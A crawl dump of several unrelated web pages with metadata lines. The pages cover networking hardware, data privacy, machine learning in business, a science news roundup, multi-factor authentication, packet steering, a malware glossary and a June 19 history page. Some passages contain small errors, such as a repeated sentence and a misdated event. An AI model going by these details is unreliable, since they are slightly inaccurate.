Switches, routers, and wireless access points are the essential networking basics. Through them, devices connected to your network can communicate with one another and with other networks, like the Internet. Switches, routers, and wireless access points perform very different functions in a network. Switches are the foundation of most business networks. A switch acts as a controller, connecting computers, printers, and servers to a network in a building or a campus. Switches allow devices on your network to communicate with each other, as well as with other networks, creating a network of shared resources. Through information sharing and resource allocation, switches save money and increase productivity. Routers connect multiple networks together. They also connect computers on those networks to the Internet. Routers enable all networked computers to share a single Internet connection, which saves money. A router acts a dispatcher. It analyzes data being sent across a network, chooses the best route for data to travel, and sends it on its way. Routers connect your business to the world, protect information from security threats, and can even decide which computers receive priority over others. Beyond those basic networking functions, routers come with additional features to make networking easier or more secure. Depending on your security needs, for example, you can choose a router with a firewall, a virtual private network (VPN), or an Internet Protocol (IP) communications system. An access point* allows devices to connect to the wireless network without cables. A wireless network makes it easy to bring new devices online and provides flexible support to mobile workers. An access point acts like an amplifier for your network. While a router provides the bandwidth, an access point extends that bandwidth so that the network can support many devices, and those devices can access the network from farther away. But an access point does more than simply extend Wi-Fi. It can also give useful data about the devices on the network, provide proactive security, and serve many other practical purposes. *Access points support different IEEE standards. Each standard is an amendment that was ratified over time. The standards operate on varying frequencies, deliver different bandwidth, and support different numbers of channels. To create your wireless network, you can choose between three types of deployment: centralized deployment, converged deployment, and cloud-based deployment. Need help figuring out which deployment is best for your business? Talk to an expert. 1. Centralized deployment The most common type of wireless network system, centralized deployments are traditionally used in campuses where buildings and networks are in close proximity. This deployment consolidates the wireless network, which makes upgrades easier and facilitates advanced wireless functionality. Controllers are based on-premises and are installed in a centralized location. 2. Converged deployment For small campuses or branch offices, converged deployments offer consistency in wireless and wired connections. This deployment converges wired and wireless on one network device—an access switch—and performs the dual role of both switch and wireless controller. 3. Cloud-based deployment This system uses the cloud to manage network devices deployed on-premises at different locations. The solution requires Cisco Meraki cloud-managed devices, which provide full visibility of the network through their dashboards. Our resources are here to help you understand the security landscape and choose technologies to help safeguard your business. These tools and articles will help you make important communications decisions to help your business scale and stay connected.
<urn:uuid:0dc29d2b-110a-486f-ad1e-1cf93e204a4a>
CC-MAIN-2022-40
https://www.cisco.com/c/en/us/solutions/small-business/resource-center/networking/networking-basics.html?ccid=cc001530
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00076.warc.gz
en
0.929834
697
3.828125
4
We all enjoy life in the digital age and the Internet provides us connectivity, efficiency and fun. By submitting some of our personal data into online interfaces, we enjoy significant benefits in the form of services tailored to our needs; from banking to work, ecommerce, transport, dating, social media and everything in between. But, by using our personal information, and sometimes posting it in the public domain, we have created a problem. Who owns this personal data once it leaves your keyboard? And if it is misused, who is the negligent party? It might be you. A day in the life of data: Just how much information do you give away? Before the development of computer databases, we had certain expectations about privacy and accepted a certain level of public disclosure of personal information. And it seems this statement still rings true. Americans say they care deeply about protecting their data. Pew Research found that being in control of who can get information about us is “very important” to 74% of Americans. However, when it comes to online, a lot of people do not consider data privacy as an important issue. The irony! With the advent of social media and messaging platforms we offer information about our personal life freely and voluntarily on a daily basis – and we rarely realize or question it. We regularly post personal (and sometimes compromising) pictures. We share our current location (and indicate where we are not!). We share our relationship status, where we went to school, where we live, work history, birth dates, phone numbers – the list goes on. And we don’t even stop to think about it. We are too busy reaping the benefits. “In general, there has never been so much personal information about individuals as readily accessible as there is today with the Internet,” says Kevin Werbach, professor of legal studies and business ethics at Wharton. “However, what most of us fail to recognize is that once content is posted online, it can be difficult to maintain total control over where it is eventually used, shared, or modified.” Personal or private – data is open to misuse Many consumers are unaware how their data is used or by whom. They operate with an assumption of trust. But data is regularly leveraged in ways the consumer never imagined. The data a user scatters can be harvested and analyzed to reveal a wide variety of personal attributes that, while seemingly innocuous by themselves, can add up to form a skeleton key that social engineers can use to unlock real personal assets or corporate secrets. Shopping habits, political affiliation, relationship status etc., can all be used as steps in the ladder of a cybercrime. Adding a sad face to a post about stray dogs, for example, can reveal what charities you might support. “You may not say much about your salary, but your ‘likes’ on brands or restaurants say a lot. Your daily routines and whereabouts can be deduced from your posts – especially if they’re geo-tagged,” says Maria Fasli, Director of the Institute for Analytics and Data Science, University of Essex. And when it comes to email and messaging services, most of us blindly accept that this information is private. But privacy and the internet don’t go hand in hand. Just who, other than the intended recipient, will receive or have access to the information you provided? Will it be shared with other parties? Is it at risk of being used in ways you did not consent to? Anita L. Allen, professor of law and philosophy at the University of Pennsylvania and a leading expert on privacy issues, says the core questions raised by misuse of the Internet are not new. “It goes way back to the general problem that people will use personal information that they can collect through surreptitious or open means to advance their interest at our expense. What is new is the ease with which information can be collected and shared, and the ease with which it can be maintained for indefinite periods of time.” So, if we know our online data, both private or professional, can be misused, who is the negligent party? Are you to blame? The more fundamental question is not whether you own your personal data. The real question is whether or not you can control your personal data once it’s out there. Who owns your personal data and who controls your personal data? There are definitely blurred lines when it comes to data ownership – and negligence. If you post your social security number online, it’s pretty clear that if something bad happens, you are the negligent party. But when it comes to other personal data shared or communicated, it’s not so black and white. Way back in the 2006, Kevin Werbach, who already was concerned about data ownership when using third parties, stated, “There’s a difference between putting information on a purely public site, like your own website that’s accessible to anyone in the world, and putting something on a site like Facebook, which is a controlled, private site available only to its members,” Werbach notes. “The question of who owns the information on these sites is a very interesting one. Most have policies saying they have ownership of anything posted there, but clearly that doesn’t give them leeway to do anything they want with that information. And they have privacy policies that impose limits on how they can use that data. But there’s no simple answer as to whether the information belongs to me or to the site.” And that was more than a decade ago. Personal Data Security: How can we better protect ourselves? In the early days of eCommerce, it was common for some people to have misgivings about entering their credit card into a website. What has taken a bit more time to emerge, however, is awareness of the Internet’s increasing threat to personal privacy. Today, the technologies behind websites that collect data have become very sophisticated. But this is a little like when cars first made an appearance. People stepped into these hulking, loud and very fast fun machines and there was absence of speed limits, seatbelts, and not even a thought of an air bag. It took many tragedies to change laws and promote the development of safety technologies to keep us safe. When it comes to the Internet, we are basically speeding down the highway, standing in the bed of a pick-up truck. It has been fun, but now is the time to start thinking about the parameters that will keep us safe. We are in need of digital seat belts and air bags to help minimize risk and misuse of our personal data.
<urn:uuid:71371a43-5ddc-4d73-8e05-45cc679d9441>
CC-MAIN-2022-40
https://getpicnic.com/2021/09/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00076.warc.gz
en
0.953204
1,371
2.640625
3
The first aspect of advanced AI to be adopted in business was the concept of machine learning. Rather than gathering data and programming a computer as was done traditionally, machine learning allows the computer to gather its own data and, in a sense, program itself. By making complex connections between data, the computer can create new useful information. A common misconception is that machine learning is simply about automation. That’s not really the case. We have had computer automation for decades, but only through extensive programming of each “expert system” scenario, use-case and situation that the automation would encounter. Machine Learning allows the automation to act correctly in the face of an unfamiliar situation and make a decision based on its previously ingested data set. Machine learning often begins with a basic decision tree that can be built out into a full neural network of connected data sets. Dealing with large amounts of data and acting on programmed rules are where machine learning out-paces the human mind. A particularly effective application is seen in Facebook’s learning algorithms. By tracking a user’s clicks, searches, likes and time spent reading articles and posts, the algorithm creates a dynamic constantly updating picture of the person’s interests, hobbies, political views, travel plans and many other data points. This data then informs Facebook’s delivery of new content. The system then takes that user profile and curates custom content and advertising that is designed to appeal directly to the user. Each user profile is then combined with the larger set of other user profiles to produce an ongoing constantly refined AI system that learns from user activity and responds with ever-improving suggestions for content or custom-tailored advertising. Under less-advanced modeling, there would still be results, but they aren’t as refined and intuitive. For example, if a person clicks like on a post about Game of Thrones, it is simple for a computer program to lookup the metadata on Game of Thrones and determine that it is a TV show in the fantasy genre. This simple algorithm might then recommend Lord of the Rings. But a more complex machine learning system can go much deeper. Facebook’s newest tracking algorithm tracks every interaction with the site and grades them according to the type of interaction and how “meaningful” they are. While that sounds like a nebulous concept, it’s really just a distillation of a large range of data, including likes, comments, clicks, sharing, time spent reading, and dozens of other factors. Our example of Game of Thrones to Lord of the Rings might learn that people who like both of those things also are likely to like other unrelated things. Perhaps a substantial number people who are fans of these also tend to drive Honda Accords. The real systems obviously employ more variables than the three we are using for this example, but bridging the obvious connections with the not-so-obvious is the key to successful application of this type of algorithm. Stumbling Blocks of Early Adopters Learning about users and customers is an incredibly valuable and important part of business. But at this point, the early adopters are focusing on information aggregation and delivery. Acting intelligently on that information is the next step. Target found this out the hard way. Marketing personnel at the big box retailer knew that new parents are a gold mine of opportunity for their type of store. Their ability to cater to new parents can literally lead to a lifetime of customer loyalty from parent and child. Studies have also shown that this time in an adult’s life is when brand loyalty is most flexible. So Target’s machine learning was set to the task of determining when a customer became pregnant. Purchases such as pregnancy tests and prenatal vitamins could easily be tied to future purchases. This means a customer who buys maternity clothes in July will probably be shopping for car seats in September, diapers in October, one-year old clothes a year later, and so on. This carries forward to school supplies five to six years later and eventually toys, electronics and everything else a family with children buys. Using the first few indicators as a baseline, Target began offering ads to customers who appeared to be expecting. The results were good, but ran the company into a little trouble over privacy concerns when it mailed a pregnancy-related promotional ad to a teenage girl who had not yet told her father that she was pregnant. The ability to capture a customer profile and tailor products directly is an important step in improving customer satisfaction and sales, but acting on that information correctly is something that can still benefit from the human touch. That’s one reason why AI and machine learning arw not so much autopilots as they are co-pilots that still requires extensive human guidance. Analyzing the Real Costs and Savings The rapidly improving ability of computers to analyze and act on new data is changing things everywhere in the business world. However, the real measure of a successful application of machine learning comes in the benefit per dollar spent. While the eventual goal of deploying machine learning is that you can do the same job faster or better, the decision must be based on total cost, not just speed and quality of work. Imagine an AI program that can automate a job but actually takes 10 times longer to complete the work that human would. That sounds like a poor investment and a waste of resources. But what if you factor in cost? If the machine learning program and all its maintenance and hardware costs amount to just one twentieth of the total cost of a human doing the job, then there is still a relevant use case that applies to many business problems. In this scenario, you can actually deploy 10 instances of the program and complete the same work for half the cost. What Machine Learning Can’t Do (Yet) Practical application of the principles of AI and machine learning are still in their infancy, but the possibilities seem endless. There’s where some businesses run into problems. Machine learning programs can do things no human can do, like analyze years of data in a few seconds and display results and patterns. But humans are much better at determining if the results make sense in context. Humans also use intuition to respond to smaller data sets, which is something computers have no context for. One famous recent example of machine learning in action was when IBM’s Watson machine learning program faced off against Jeopardy! champions Ken Jennings and Brad Rutter. The solution to suboptimal machine learning framework is often to inject more and more quality data to help the system see more patterns. In one example, different teams competing to create a new predictive system for Netflix to recommend movies found that their models worked best when they were able to combine all the data sets that each team was using. This is useful for areas where you have a large dataset, but it slows the adoption of machine learning in a brand new field of study. Optimized processes done by humans may not experience much improvement when an AI attempts to do the same job. The cost of “teaching” the system by gathering and inputting data and programming the rules for the data could be cost-prohibitive. One famous recent example of machine learning in action was when IBM’s Watson machine learning program faced off against Jeopardy! champions Ken Jennings and Brad Rutter. Armed with an extensive set of encyclopedias and other text, Watson did very well against two of the game’s best human champions and defeated them in a two-game tournament in 2011. But from a pure business perspective, the multi-year efforts of a team of more than 15 data scientists was not a successful venture. Why? Because Watson’s winnings totaled just $1 million, which is far less than the cost of the project. Obviously, in the Watson case money was not the goal. The $1 million went to charity and the win provided extensive marketing value to IBM while introducing the world to a new level of AI. But that type of project is not in the cards when making a case for real-world business AI. The reality is that aside from a few mature applications such as monitoring large IT systems and data centers, email and spam filtering, travel time and traffic analysis by apps such as Waze or Uber, and other applications of large amounts of data, many AI and machine learning tools are still in the pilot-program stage. At this part of the product lifecycle, they can do a few interesting things, but are not able to produce the total bang-for-the-buck that will revolutionize business. Other existing tools work in a limited fashion but still need extensive human interaction – known as supervised learning — to support and verify the results. These tools often produce only marginal cost savings. These products exist because they fill a niche for the companies that are looking to leverage the latest buzzword – “machine learning” in this case – before they have a complete AI-focused business enterprise strategy in place.
<urn:uuid:eeee6170-c6b0-4f7e-a6f9-b03ae922682b>
CC-MAIN-2022-40
https://entint.com/blog/artificial-intelligence/how-ai-and-machine-learning-are-changing-business/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00277.warc.gz
en
0.958964
1,841
3.21875
3
We’ve had the data cloud for some time — now comes data slime. We learned this week that scientists at Harvard were able to store data in Escherichia coli bacteria. Elsewhere, researchers found a second layer of information hidden inside DNA, and Microsoft data scientists used online search to detect pancreatic cancer in some cases even before medical diagnosis. A team of scientists from Harvard University found a way to store data in bacteria as if they were a living hard drive. Using the CRISPR-Cas gene editor, they stored 100 bytes of data — enough to encode the length of an average sentence — as pieces of synthetic DNA inside E. coli bacteria. “The results lay the foundations of a multimodal intracellular recording device,” the team wrote in the journal Science, which published the results. Popular Mechanics reported that “these living memory sticks can pass this data on to their descendants, and scientists can later read that data by genotyping the bacteria.” The John D. and Catherine T. MacArthur Foundation is already famous for awarding annual richly endowed “genius” fellowships to creative individuals ranging from poets to neuroscientists. Last week the foundation announced it would fund, with $100 million, “a single proposal designed to help solve a critical problem affecting people, places, or the planet.” The competition, called 100&Change, is open to companies as well as nonprofits located anywhere in the world. “Solving society’s most pressing problems isn’t easy, but we believe it can be done,” said MacArthur President Julia Stasch. “Potential solutions may go unnoticed or under-resourced and are waiting to be brought to scale.” Scientists at the Leiden Institute of Physics have shown that our DNA hides a second layer of information that helps “determine who we are.” Unlike the first, genetic layer, which encodes our genes, the second layer is mechanical and stores information in the way DNA is folded. “Each of our cells contains two meters of DNA molecules, and these molecules need to be wrapped up tightly to fit inside a single cell,” the team wrote in a news release. “The way in which DNA is folded determines how the letters are read out, and therefore which proteins are actually made. In each organ, only relevant parts of the genetic information are read. The theory suggests that mechanical cues within the DNA structures determine how preferentially DNA folds.” The findings were reported in the journal PLOS One. Data scientists at Microsoft have studied online search data to find early clues to pancreatic cancer. The team “used anonymized Bing search logs to identify people whose queries provided strong evidence that they had recently been diagnosed with pancreatic cancer — a particularly deadly and fast-spreading cancer that is frequently caught too late to cure,” according to a Microsoft blog post. “Then they retroactively analyzed searches for symptoms of the disease over many months prior to identify patterns of queries most likely to signal an eventual diagnosis.” The scientists reported their findings in the Journal of Oncology Practice. “We found that signals about patterns of queries in search logs can predict the future appearance of queries that are highly suggestive of a diagnosis of pancreatic adenocarcinoma,” the authors wrote. “We showed specifically that we can identify 5 percent to 1 percent of cases, while preserving extremely low false-positive rates (0.00001 to 0.0001).” Researchers in Australia have developed light-emitting nanoparticles that can be embedded into glass while preserving its transparency. They say that this “smart” hybrid glass could be “a major step” to 3D display screens, biological sensors and other applications. “Integrating these nanoparticles into glass, which is usually inert, opens up exciting possibilities for new hybrid materials and devices that can take advantage of the properties of nanoparticles in ways we haven’t been able to do before,” said the study’s lead author, Tim Zhao, from the University of Adelaide’s School of Physical Sciences and Institute for Photonics and Advanced Sensing. “For example, neuroscientists currently use dye injected into the brain and lasers to be able to guide a glass pipette to the site they are interested in. If fluorescent nanoparticles were embedded in the glass pipettes, the unique luminescence of the hybrid glass could act like a torch to guide the pipette directly to the individual neurons of interest.” Scientists from the University of Adelaide, Macquarie University and the University of Melbourne collaborated on the project. The research was published in the journal Advanced Optical Materials.
<urn:uuid:7c38e38a-3d45-43a7-98ad-e964b0a0bc75>
CC-MAIN-2022-40
https://www.mbtmag.com/global/article/13108859/five-coolest-things-on-earth-this-week
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00277.warc.gz
en
0.944826
983
3.296875
3
For every business – big or small – security is of paramount importance in today’s hyper-connected digital space. Because nothing tanks your bottom line more than an intrusion due to a security lapse. There are thousands of security tools deployed to protect cyber attack vectors, including multi-factor authentication. Multi-factor authentication is important for every commercial establishment because it is the most cost-effective method of protecting assets – usually at little to no cost. The premise behind multi-factor authentication is simple: users have to provide at least two pieces of verification factors to gain access to an account. This is because passwords and usernames are relatively easy to acquire. But a third verification factor, such as fingerprints, mobile phone, or keycard, is virtually impossible to gain access to. Multi-factor authentication stops the vast majority of petty criminals in their tracks. In fact, nearly 80% of breaches are caused by stolen or weak passwords. One survey by the Digital Shadows Photon Research found that a whopping 15 billion credentials are available on the dark web, including usernames with their relevant passwords for online banking! How Multi Factor Authentication Works Multi-Factor authentication works by identifying one or several of the following factors: Knowledge Factor: Information that only the user is likely to know, such as a PIN or Password Possession Factor: These are credentials based on items that the user is likely to possess, such as a security key, Google Authenticator app, or a mobile phone Inherence Factor: Metrics that authorized users own. They take the form of biometrics such as fingerprints, facial recognition, and eye patterns. Location Factor: Access is granted to devices based on their IP address or geographic location. This can ward off bad actors from attempting to breach data from different geographical origins. Businesses can combine a few or all of the above authentication methods to grant access to individuals Why Passwords Are No Longer Enough Passwords no longer offer the desired level of security because of two reasons: i) brute forcing attempts can eventually break passwords and grant access to accounts ii) multiple data breaches have provided bad actors with access to passwords (you can check if your account has been compromised at haveibeenpwned.com) One outdated security advice involved changing the password and using complex characters would provide a sufficient level of security. That is no longer the case – even if the password is extremely complex. This doesn’t mean you shouldn’t change the password every few months – it means you should add an extra layer of protection. And given the fact most people use the same password across different account makes it all too easy for hackers to break into an account. For example, let’s say you used the same password for your Google account and your employee account. Suppose someone gains access to the credentials you use for your employee account. They now have access to your Google account – and with, access to vital pieces of personally identifying information and financial data. However, you can completely nullify unauthorized access by rolling out multi-factor authentication across your accounts. The Value of MFA Multifactor authentication for sure is inconvenient, because it takes longer to sign in – but the tedious signing-in process is a good trade off for security. You can never put a price on security. Many employees express their frustration when dealing with a second factor every time they sign in. It also goes without saying that MFA is time-consuming and expensive to set up. The extra inconvenient steps you and your employees have to go through are worth the security features. MFA makes your networks, accounts, and databases impervious to breaches and hacks. Bulletproof Solutions for Remote Working Businesses have pivoted to a hybrid working model (work from home and office). This has increased the need for increased cybersecurity measures – and multi-factor authentication is one of the simplest ways of adding more protection. Many businesses are now rolling out adaptive MFA, which uses contextual information to determine which identifying factors should apply to a particular user or account. Adaptive MFA looks at various details such as the user’s device and location to provide more context. For example, a user signing in from their office in a trusted location won’t be asked to provide additional security factors. But if they log from their home or personal mobile, they may be asked to provide an additional factor because they are using an untrusted device or connection. Adaptive MFA also solves the problem of inconvenience for most users as long as they are working from a trustworthy connection. Adaptive MFA makes it easy to gain access to accounts without disrupting the user experience. Moreover, it avoids weighing down the IT team with frequent password resets. MFA secures a digital environment and the people in it – and the best part is that it also meets regulatory requirements. For example, regulatory frameworks such as the Payment Card Industry Data Security Standard (PCI-DSS) require MFA to be implemented in certain situations to prevent unauthorized users from accessing payment processing systems. The Risk of Not Using MFA The vast majority of data breach attempts can be stopped with MFA. It is an effective means of protection from social engineering, phishing, and brute force attacks and prevents hackers from using stolen credentials or exploiting weak passwords. Adding MFA is the most cost-effective security feature that enterprises can add to prevent cyber security incidents. It is useful even in industries that don’t require MFA for regulatory compliance. If someone with the resources wants to discover your credentials, they most likely can, especially now that more businesses are working remotely. However, MFA stops them with an extra layer of protection, with little to no effort required on your end. Ready to secure your workforce and roll out cybersecurity measures? Get started today and use multi-factor authentication to protect your employees, your business, and your reputation from cybersecurity incidents.
<urn:uuid:594d834c-826b-4649-841c-5d1df3e6c45d>
CC-MAIN-2022-40
https://microsysinc.ca/multi-factor-authentication/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00277.warc.gz
en
0.945094
1,221
2.78125
3
Host Packet Buffer (HPB) In order to support multi-core CPUs and multithreaded host applications, ANIC adapters utilize a flexible host packet buffer (HPB) technique. Host memory is segmented into a number of fixed size blocks. The block size is configurable but is typically 2MB or 4MB each. A collection of these host memory blocks is then dynamically pooled together to form a host packet buffer. A specific application thread (often tied to a CPU core) is then explicitly assigned or linked to a given HPB and will only process data that is transferred into its own HPB. Up to 64 independent HPBs can be created (per ANIC adapter) and in turn assigned to up to 64 host application threads. The memory blocks (typically 2MB or 4MB in size) assigned to a host packet buffer (HPB) do not have to be contiguous. In other words, each HPB is composed of blocks of host memory that are randomly spread out in various areas of physical memory. In addition, memory blocks are temporarily assigned to a given HPB by the ANIC adapter and once an application thread has finished processing all the data from a given memory block, that block can be assigned to a different HPB. An ANIC adapter is configured to intelligently steer packets in to specific host packet buffers (HPB). The benefit of packet steering is that each thread in a multithreaded application (often utilizing multiple CPU cores) can process packets from its own HPB. In this way a security or networking application can take advantage of parallel processing of data thus achieving higher levels of speed and efficiency. There are three different ways to steer packets into a HPB: - ANIC adapter is configured to use its own internal algorithms to evenly and efficiently distribute or load balance packets across a specified number (from 1 to 64) of HPBs. This is done to ensure that no processing thread is overwhelmed with data while others are starved. - Based upon the results of packet filtering, packets can be steered to specific HPBs. For example, packets that match a specific packet filter rule might all be steered to the same HPB for processing. - Based upon flow classification, packets are steered to specific HPBs. In other words, specific flows are identified and explicitly steered to a specific HPB for processing. Packet traffic is typically transferred across the PCIe bus (DMA) for consumption by the host application. However there may be circumstances under which select traffic must be locally redirected or retransmitted out of one of the ANIC network ports. Packet filtering or flow classification can be used to identify which specific packets or flows must be redirected out a given port.
<urn:uuid:bd040f28-8045-4f13-9db9-08c23828527a>
CC-MAIN-2022-40
https://accoladetechnology.com/packet-steering/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00277.warc.gz
en
0.915244
569
2.703125
3
EDR / MDRIdentify, contain, respond, and stop malicious activity on endpoints SIEMCentralize threat visibility and analysis, backed by cutting-edge threat intelligence Risk Assessment & Dark Web MonitoringIdentify and quantify unknown cyber risks and vulnerabilities Cloud App SecurityMonitor and manage security risk for SaaS apps SOC ServicesProvide 24/7 threat monitoring and response backed by ConnectWise SOC experts Policy ManagementCreate, deploy, and manage client security policies and profiles Incident Response ServiceOn-tap cyber experts to address critical security incidents Cybersecurity GlossaryGuide to the most common, important terms in the industry Expanded Definition: Malware What is malware? Malware is a broad term that covers many different types of malicious software that can be installed on devices. When threat actors try to get malware installed on an endpoint—such as a laptop, desktop computer, or mobile phone—they’re doing it with the intention to harm, extort, or scare the organization. Malware is on the rise. In Q2 2020, the McAfee Labs Threats Report found a 12% increase in the number of threats per minute (419, to be precise) compared to Q1. And malware was used as the means of attack in 35% of cases that were shared publicly. Oftentimes, malware makes it around IT defenses via user error or out-of-policy behaviors, such as: - Responding to a phishing email - Downloading files from untrusted contacts - Clicking on malicious links Once a piece of malware is installed, it starts its work. Depending on the type of software, it may exfiltrate valuable data, lock down the computer for ransom (see ransomware), scare the user into doing something, or quietly spy on the machine for monetary or other purposes. Common types of malware Some of the most common types of malware that managed service providers (MSPs) will encounter are targeted at endpoints such as laptops, desktop computers, and mobile devices. Ransomware is a form of malicious software that, once installed on an endpoint, locks down the system until the user pays a ransom to have it released. When threat actors use ransomware, they sometimes encrypt the files, so the content of the computer becomes unreadable. Beyond encrypting the data, it is also becoming more common for bad actors to exfiltrate data—stealing it from corporate systems—in order to increase the chances that targets will pay the ransom. Ransomware is a growing problem; per the 2020 Sophos State of Ransomware report, 51% of companies said they’d experienced a ransomware attack in the last year. The definition of spyware can be broad. Some spyware is actually installed by legitimate software vendors, for example, with the intent of monitoring user activity for more benign purposes like serving ads. For the purposes of the ConnectWise Cybersecurity Glossary, we’re defining it purely in its malicious sense: software installed to spy on an organization or user with harmful intent. With spyware, hackers can monitor the activities of a user without being noticed and steal sensitive information, such as corporate or personal details. If the name “trojan” conjures visions of the ancient city of Troy and a wooden horse, then you’ve understood the origins of the term. Trojans are pieces of software that masquerade as something harmless or even helpful. But, in reality, the software is performing harmful behaviors, such as stealing data. These pieces of malware are localized, meaning that they don’t spread from computer to computer (like a virus does). Today, many trojans take the form of crypto ransomware—once they’ve sneaked into a system under the guise of something else, they encrypt or exfiltrate data and demand a ransom. Last but not least, viruses are one of the most well-known pieces of malware. Most MSP clients will probably have heard of computer viruses and antivirus software. Viruses make their way onto computers through infected files, and then—like their biological counterparts—the viruses replicate and spread. When this happens, entire networks can fall victim. These are just a few examples of malware. There are many, many more forms of malware out there. However, in all cases, the intent is the same: to damage the target and/or extract some monetary gain. The MSP role in defending against malware As a trusted IT partner, MSPs are often the frontline defense against malware for small to midsize businesses (SMBs) and other organizations. MSPs provide the technology and knowledge necessary to keep IT systems updated, and they do the actual work of ensuring that organizations are using the right tools—such as firewalls and antivirus—to catch or remove malware. Malware can be installed in many different ways. That’s why MSPs are so critical in providing frontline defense. Some of the core ways that MSPs support cybersecurity and lower the risk of malware include the following. Hackers target endpoints 24/7. That’s why strong endpoint management is an important service. Good endpoint management will include: - Controls to prevent unknown software applications from installing - Ongoing scanning for every file to catch any infected items - Health reports on a device’s performance - And more By monitoring and managing a client’s endpoints closely, MSPs can shore up defenses and limit some of the ways that attackers might try to install malware. From household names like Microsoft 365 to third-party vendors, legitimate software is unfortunately a common vector for malware. Hackers can take advantage of vulnerabilities in older versions to install malware. The best way to prevent this from happening is software patching. With patch management, MSPs ensure their clients are always running the most current versions of software. And with automation, MSPs can automatically update machines—removing the risk of human error and saving technicians time. Even before the rise in remote work due to coronavirus, MSPs were servicing clients at a distance with remote monitoring technology. Tools like remote monitoring and management (RMM) software enable MSPs to keep a close eye on all their clients’ many endpoints, often from a birds-eye dashboard. By monitoring systems remotely, MSPs don’t have to wait until a user brings a machine to them for a tuneup—they can catch any suspicious device or network activity from afar, and then send in help. Security Operations Center (SOC) As noted, security is a 24/7 job. MSPs can offer clients additional security with an expertly-staffed security operations center (SOC). Working day and night, the SOC ensures that cybersecurity threats are dealt with quickly and fully. This is crucial, since all it takes is a moment’s weakness for a hacker to slip through. A SOC can also help prevent issues before they can take root by generating ongoing research, hunting for threats, and applying best practices and removing vulnerabilities before they can be exploited. Of course, creating and properly staffing a SOC can be expensive (as much as $2.3M, according to our calculations!), which is why many MSPs may choose to partner or outsource this function. Regardless, when paired with an RMM solution and ongoing MSP support, a SOC is a powerful defense against cybersecurity threats. Did you know? Between Q1 and Q2 2020, the number of malware threats happening every minute increased by 12%. Building your MSP Cybersecurity Offerings Cybersecurity is a major area of growth for MSPs. Learn how to expand your business’ cybersecurity offerings in this ebook, including information on how to discuss cybersecurity with clients and how to price your services. Best Practices in Data Protection Against Ransomware Ransomware represents a serious threat to MSP clients, and the number of incidents is only rising. Watch this expert webinar to learn more about ransomware, what’s changing with this method of attack, and how MSPs can prepare. ConnectWise Cybersecurity Starter Kit Want to get started selling cybersecurity? We’ve put together a kit to help. Download the kit today for helpful resources that will transform your business from an MSP to an MSP+ model, including educational information for your SMB customers, templates, and more. The SMB Cybersecurity Checklist How secure are your SMB clients? Chances are, they may not fully understand their risks and exposures. Use this 30-item checklist to start the conversation around cybersecurity, help them understand the cybersecurity landscape, and assess their security postures. Creating Opportunity from Adversity: The State of SMB Cybersecurity in 2020 SMBs are not immune from cybersecurity risks—quite the contrary. Our 2020 survey of 700 SMB decision makers uncovered interesting findings about how these businesses are thinking about cybersecurity, their spending plans, and what motivates them when it comes to security.
<urn:uuid:f7de27fe-187f-4106-8f2c-c4dc1d1876e3>
CC-MAIN-2022-40
https://www.connectwise.com/cybersecurity-center/glossary/malware
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00277.warc.gz
en
0.919818
1,952
2.78125
3
Today In History June 19 June 19 is the 170th day of the year 2020 (171st in leap years) in the Gregorian calendar. 195 days remain until the end of the year. Juneteenth (a Portmanteau of June and nineteenth)also known as Freedom Day, Jubilee Day, and Liberation Day) is an unofficial American holiday celebrated annually on June 19th in the United States. June 19 has its importance in world history. It’s truly said by Karl Marx, “Revolutions are the locomotives of history”. Let’s take a look at what June 19 holds in history. June 19, 1865: There’s more than one Independence Day in the United States. In Galveston, Texas, upon the arrival of Union troops, Major General Gordon Granger read General Order No. 3 “The people of Texas were informed that, by a proclamation from the Executive of the United States [President Lincoln], all slaves are free. This involves an absolute equality of personal rights and property rights between former masters and slaves.” As a result, an estimated 250,000 enslaved African Americans in Texas were finally freed. The day is now celebrated as Juneteenth to commemorate Emancipation and to recognize the struggle for freedom and equality of African Americans. June 19, 1953: Julius and Ethel Rosenberg were by electrocution at Sing Sing Prison in New York. They had been found guilty of providing vital information on the atomic bomb to the Soviet Union during 1944-45. They were the first U.S. civilians to be sentenced to death for espionage and were also the only married couple ever executed together in the U.S. On 19th June, on which numerous events occurred and it’ll be difficult to believe that many such types of events took place on this day alone. Starting from several political developments to many gory wars the history books have a lot to tell about this fateful day. Some interesting achievements on June 18, 1952, the United States Army Special Forces, the elite unit of fighters known as the Green Berets, was established at Fort Bragg, North Carolina. The celebrity-panel game show “I’ve Got a Secret” debuted on CBS-TV. Also, the dangerous event occurs in the year1944, during World War II, the two-day Battle of the Philippine Sea began, resulting in a decisive victory for the Americans over the Japanese, which is almost known to all happened the same day. Some of the most devastating and deadly natural calamities as well as man-made catastrophes also occurred on this day.
<urn:uuid:02b2b03c-266f-4f15-8464-deed6818069f>
CC-MAIN-2022-40
https://areflect.com/2020/06/19/today-in-history-june-19/?amp
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00277.warc.gz
en
0.976799
595
3.65625
4
